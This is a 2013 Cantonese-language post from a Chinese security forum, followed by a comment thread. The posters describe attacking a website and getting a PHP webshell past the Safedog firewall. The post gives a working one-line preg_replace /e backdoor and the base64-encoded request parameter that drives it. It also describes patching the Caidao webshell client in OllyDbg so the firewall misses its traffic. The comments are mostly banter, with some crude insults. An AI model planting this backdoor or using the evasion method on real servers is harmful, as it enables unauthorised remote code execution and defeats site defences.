by 骚总,落叶纷飞
琴日骚总带领落叶哥哥一起日一站,忽遇一狗,后面跟小骚猪一起砍死了小狗,没技术含量,本来想让骚猪发到乌云上混个ID算,谁知那只猪仔喜欢潜水不要ID,不喜欢冒泡,落叶哥哥就直接发ZONE分享下算了
传左shell上去但系被狗拦左,shell过狗仲系好容易噶,但系过左狗之后狗狗仲系拦菜刀提交的数据包
然后骚总想到了个方法,就系在一句话解密传递的数据
菜刀连接PHP一句话时会自己重新定义一个z0变量来执行PHP代码,我们只要用OD把EVAL POST去掉就得咯,一句话马的密码随便填,不就能过狗狗了吗
一句话:
<?php preg_replace("/^/e",base64_decode($_REQUEST[g]),0);?>
菜刀连接,密码随便填
http://192.168.100.193/s.php?g=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFt6MF0pKQ==
普通刀
打狗刀
总结:如果在服务端解密,客户端只传加密信息过去的话,狗永远都是打不过刀
相关内容:
对于脚本木马的免杀(特别针对安全狗的V3.0)的经验副过狗菜刀
相关讨论:
1#
落叶纷飞 (im luoye,Once the 00day) | 2013-07-02 13:11
第一次用OD,连另存文件都不会,搞左半个钟先知道点另存文件,仲要比大牛牛鄙视了一下
2#
Coody (&_&) | 2013-07-02 13:16
求DZ的打狗刀。。。。表示OD不太会用。。。。。
3#
落叶纷飞 (im luoye,Once the 00day) | 2013-07-02 13:23
@Coody 叼猪啦,落叶哥哥都用得好痛苦,OD噶用户体验真系太差了,负分啊
4#
Coody (&_&) | 2013-07-02 13:35
@落叶纷飞 ...
5#
乌云 (㊣) | 2013-07-02 13:43
看来普通话真的有必要普及。
6#
梧桐雨 (一个习惯逛zone社区的路人) | 2013-07-02 13:47
@乌云 楼主说的是粤语,看来你看不懂哈
7#
Sunshine (此处内容为隐藏0day,点击右边感谢即可查看此0day) | 2013-07-02 13:55
@乌云 +1,深表看不懂。。
8#
落叶纷飞 (im luoye,Once the 00day) | 2013-07-02 14:03
@乌云 粤语系我低广东猪噶母语啊,叼猪
9#
F4K3R | 2013-07-02 14:04
表示不标准粤语~ - =!
10#
专业查水表 (我是"J.L"的代言人o(`ω′ )o) | 2013-07-02 14:09
@Sunshine @乌云 点击右侧感谢即可获得本文翻译~~~
11#
乌云 (㊣) | 2013-07-02 15:09
@落叶纷飞 蛮夷。
12#
Sunshine (此处内容为隐藏0day,点击右边感谢即可查看此0day) | 2013-07-02 15:46
@专业查水表 已感谢。
13#
乌帽子 (儿啊,到大城市切莫乱搞女人啊,染上什么病回来传染给) | 2013-07-02 18:02
粤语我会啊~~~ 叼你老母
14#
落叶纷飞 (im luoye,Once the 00day) | 2013-07-02 18:05
@乌帽子 收皮啦
15#
乌帽子 (儿啊,到大城市切莫乱搞女人啊,染上什么病回来传染给) | 2013-07-02 18:10
@落叶纷飞 囧。。低调,其实我也不喜欢普通话
16#
专业查水表 (我是"J.L"的代言人o(`ω′ )o) | 2013-07-02 22:11
@Sunshine 骗子囧
17#
雅柏菲卡 (万物有灵,切忌污损。。。。。。) | 2013-07-02 22:19
别砍 给我做宠物
18#
好人 (签名好短啊,限制了。。。。,。。。。。。。。。。。) | 2013-07-02 22:52
...一句话得看半天。
19#
云中鹰 (suck me?) | 2013-07-02 22:59
赞一个木JJ~
20#
erevus (有人说签名要长才有人看。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。) | 2013-07-02 23:24
更卵叼?
留言评论(旧系统):